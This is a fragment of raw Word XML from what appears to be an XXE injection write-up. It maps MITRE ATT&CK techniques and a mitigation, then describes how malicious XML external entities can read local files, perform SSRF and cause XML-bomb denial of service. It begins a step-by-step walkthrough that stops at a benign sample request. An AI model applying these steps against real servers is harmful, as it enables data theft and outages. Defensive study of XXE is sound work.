                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="58680C73">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693046E8">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761987" w14:textId="387F5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B0FDCE8" w:rsidP="0D325B6E" w:rsidRDefault="5B0FDCE8" w14:paraId="1E9B6B72" w14:textId="4F24597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5B0FDCE8">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B6165F2" w14:textId="1BEAC21D">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R91be29551b61447f">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T11</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6FDC81FE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>90</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="6674376C">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677A4014">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Exploit Public-Facing Application</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="7376673A" w:rsidP="0D325B6E" w:rsidRDefault="7376673A" w14:paraId="62B3D2FA" w14:textId="716B41E4">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R3d3043b099714c21">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7376673A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1005</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="62DD0C0E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7376673A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Data from Local System</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="75660DEA">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CCCC773"/>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F4E76ED" w:rsidP="0D325B6E" w:rsidRDefault="4F4E76ED" w14:paraId="3F9FCD45" w14:textId="1D6D1C5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4F4E76ED">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4FCD79" w:rsidP="0D325B6E" w:rsidRDefault="494FCD79" w14:paraId="6ABB0993" w14:textId="185EA1B1">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R6df9a61a60314d9e">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="494FCD79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1038</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="56F18A1A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="494FCD79">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Execution Prevention</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="3CA2A9F5" w:rsidP="0D325B6E" w:rsidRDefault="3CA2A9F5" w14:paraId="6D1EAED2" w14:textId="43348C84">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:suppressLineNumbers w:val="0"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rb09941102ddd41e4">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3CA2A9F5">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4570FCC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54EAB66" w14:textId="2BEB1093">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C126D2A" w14:textId="563C0AA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05A96459" w14:textId="1F3306BC"/>
    <w:p w:rsidR="307E7360" w:rsidP="0D325B6E" w:rsidRDefault="307E7360" w14:paraId="6F760CA0" w14:textId="3F094185">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7E736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DB2EEE7" w:rsidP="0D325B6E" w:rsidRDefault="2DB2EEE7" w14:paraId="33A6BE52" w14:textId="2440052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DB2EEE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7BC5C9A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BC5C9A7">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0D325B6E" w:rsidR="7BC5C9A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows attackers to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03E0AD5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">control </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="48C073E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">parts </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03E0AD5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03E0AD5D">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03E0AD5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="03E0AD5D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>processed</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E6A9825">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML data. </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="36AE532E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The attacker can then inject malicious XM</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="36AE532E">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754145D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6AE532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6AE532E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="36AE532E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> external entities that can be used to access local files</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F08B0F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B631669">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0F08B0F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> denial-of-service attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46A90AAD">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46A90AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ex</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="07608DE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecute server-sid</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="07608DE9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e request forgery</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="46A90AA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2D11AD6">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6A90AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="72B2DBE2">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6A90AAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="07A46EFD" w14:textId="4AC2F46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07E7360" w:rsidP="0D325B6E" w:rsidRDefault="307E7360" w14:paraId="06847578" w14:textId="2C36BF1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7E736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43CEC7C" w:rsidP="0D325B6E" w:rsidRDefault="443CEC7C" w14:paraId="219BC80D" w14:textId="48C4F48C">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3CEC7C">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="443CEC7C">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443CEC7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> this vulnerability to exfiltrate confidential data stored in files from the machine, as well as take down services </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69A5863C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69A5863C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>long periods</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="69A5863C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of time </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="443CEC7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="290EF9BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML bomb</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7AEDFDAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-based </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="443CEC7C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">denial-of-service </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5252D213">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3BF17949">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018A5E39" w14:textId="324D45E4">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07E7360" w:rsidP="0D325B6E" w:rsidRDefault="307E7360" w14:paraId="609AD6C8" w14:textId="64DB40E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7E736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943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="2F2BDB76" w14:textId="4230E98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Step 1: Find an editable XML request being sent to the se</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="25BBA4F0">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ver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="33ED848C" w14:textId="38AA98F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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3943430A" w:rsidP="0D325B6E" w:rsidRDefault="3943430A" w14:paraId="6C30CBEC" w14:textId="24934DBF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>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stockCheck</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productId</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&gt;381&lt;/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productId</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stockCheck</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w:t>
      </w:r>
    </w:p>
